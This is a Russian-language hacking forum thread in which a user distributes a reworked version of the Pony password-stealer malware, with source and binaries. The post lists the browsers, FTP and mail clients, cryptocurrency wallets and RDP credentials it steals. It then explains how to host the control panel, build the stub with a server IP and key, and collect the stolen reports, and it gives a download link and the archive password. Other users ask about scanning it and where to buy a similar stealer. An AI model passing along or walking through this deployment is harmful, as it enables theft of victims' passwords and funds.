Бесплатно Стилер паролей обновленный и доработанный

bitsteam

Заблокирован
Регистрация
23.04.17
Сообщения
0
Реакции
0
Обратите внимание, что пользователь заблокирован на форуме. Не рекомендуется проводить сделки. Если пользователь уже обманул вас каким-либо образом, обратитесь в наш арбитраж, дабы мы могли по возможности урегулировать возникшую у вас проблему.
Реверс и доработка обновленного стиллера Pony, полные исходники + бинарники (full source, stealer, pony)

В связи в огромным шумом/дисскуссией и массовым баном, выкладывание исходников стиллера и hVNC не было пропущено моим вниманием.

Я скачал исходники и начал ковырять, думал прикрутить этот паблик стиллер в Mimi9, но каково было моим разочарование когда я понял, что это сильно переделанный/обновленный pony.

Т.к. пони является двух компонентным стиллер - внедрение в другие программы - очень затруднительно, надо переписывать админку, а если админка не на php - это катастрофа.

Но я решил, что выложу в паблик, чтобы добро не пропало, т.к. НИКТО не осилил кроме меня (хвала мне - Повелителю небес).

+ работает на всех ОС (тестировалось на win10x64)
+ отдают бесплатно
+ имеет исходники
+ поправлены мелкие баги
+ шифрование трафика
+ красивая админка
+ малый вес


Поддерживает
---браузеры:

chrome,mozilla,ie,chromium,nichrome,comododragon,kmeleon,epic,staff,flock,mozill
a,opera,yandexinternet

---ftp слиенты
wtc,far,ws_ftp,cuteftp,flashfxp,filezilla,ftpcommander,bulletproof,smartftp,turb
oftp,ffftp,coreftp,ftpexplorer,frigateftp,securefx,ultrafxp,ftprush,
websitepublisher,bitkinex,expandrive,classicftp,fling,softx,directoryopus,freeft
p,leapftp,winscp,32bitftp,netdrive,webdrive,ftpcontrol,wiseftp,ftpvoyager,
firefox,fireftp,seamonkey,leechftp,odin,winftp,ftp_surfer,ftpgetter,alftp,dreamw
eaver,deluxeftp,aceftp,globaldownloader,freshftp,blazeftp,netfile,
goftp,3dftp,easyftp,xftp,ftpnow,roboftp,cert,linasftp,rockmelt,cyberduck,putty,n
otepadpp,vs_designer,ftpshell,ftpinfo,nexusfile,fs_browser,coolnovo,winzip,
myftp,sherrodftp,novaftp,becky,fasttrack,ftpdisk

---mail агенты
pocomail,incredimail,thebat,outlook,thunderbird

---coin криптовалюту
bitcoin,electrum,multibit,litecoin,namecoin,terracoin,bitcoinarmory,ppcoin,prime
coin,eathercoin,novacoin,freicoin,devcoin,frankocoin,protoshares,megacoin,
quarkcoin,worldcoin,infinitecoin,ixcoin,anoncoin,bbqcoin,digitalcoin,mincoin,gol
dcoin,yacoin,zetacoin,fastcoin,i0coin,tagcoin,bytecoin,florincoin,phoenixcoin,
luckycoin,craftcoin,junkcoin

---другое
RDP

И так что сделал:
- взял веб панель пони и переписал в ней протокол, чтобы соответствовал тому, что в стиллере - это самый геморройный этап, т.к. протокол у пони просто жесть избыточный и пришлось много реверсить.
- доработал код в стиллере, т.к. автор кое что там удалил (видимо такой был антинуб)
- написал свой простенький билдер, чтобы Вам мои дорогие друзья было легче его БАРЫЖИТЬ (застукаю хоть на одном форуме - 100% бан обеспечен)
- отключи получение истории браузеров (много вешает, панель тяжело переваривает и багаеться)

В наличии:
- panel- исходники панели на php v5.*
- stub - исходники стиллер на С++, компилились на VC2010
- bulder - исходники билдера на Delphi 7 - так было проще и быстрее
- inst - компилленая версия
- test - простенький исходник для тестового запуска dll на Delphi 7

По установке:
Заливаем панель на хостинг, ставим права на запись на папку temp, создаем базу, открываем через браузера файл http://сайт/setup.php заполоняем все параметры БД и админки.

Далее вход в админку http://сайт/admin.php
Заходим в папку inst, запускаем builder.exe


Вводим ip (именно IP) и ключь (обязательно 4 символа), ключь должен совпадать с тем что в панели

Ключь сделайте уникальным, чтобы кто попало не слал хрень.
Далее запускаем test.exe и ждем от 10-30 минут, у вас в панели должны появиться отчеты.
ссылка на скачивание pony.rar
пасс на архив 12345
 
Профиль пользователя не подтвержден! Работа с ним может быть не безопасна!
Для подтверждения нужно быть зарегистрированным больше года или приобрести повышение прав.

Merushka

Легенда
Подтвержденный
Регистрация
05.03.17
Сообщения
1,523
Реакции
908
Приложите Hybrid-analysis.com отчёт на любые .ехе файлы. Проверка на склейки.
 

Alex335

Пользователь
Подтвержденный
Регистрация
15.04.17
Сообщения
1
Реакции
0
Архив не полный
 

nanoman

VIP
Подтвержденный
Регистрация
16.12.13
Сообщения
3
Реакции
10
Депозит
0
Покупок
0
Продаж
0
Кто проверял, отпишитесь актуально ли ещё?
Либо посоветуйте где можно купить подобного рода продукт с поддержкой, нужен стиллер файлов ключей и паролей.
 
Сверху Снизу